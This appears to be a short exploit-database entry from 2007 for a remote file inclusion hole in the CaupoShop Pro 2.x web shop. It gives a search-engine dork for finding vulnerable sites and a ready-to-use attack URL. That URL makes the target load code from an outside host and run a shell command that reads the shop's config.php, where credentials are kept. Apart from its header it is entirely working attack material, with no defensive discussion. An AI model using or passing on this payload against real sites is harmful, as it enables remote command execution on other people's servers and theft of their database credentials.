id: 2250
date: 10/27/2007
title: CaupoShop Pro 2.x (action) Remote File Inclusion Vulnerability
author: mozi
cves: 

==============================================================
CaupoShop Pro 2.x (action) Remote File Inclusion Vulnerability
==============================================================


ork:allinurl:index.php?action= basket sid
vuln:index.php?action=
examples:
http://www.xxx.com/shop/index.php?action=http://adek.org/o.gif?&cmd=cat%20config.php



#  0day.today [2023-03-22]  #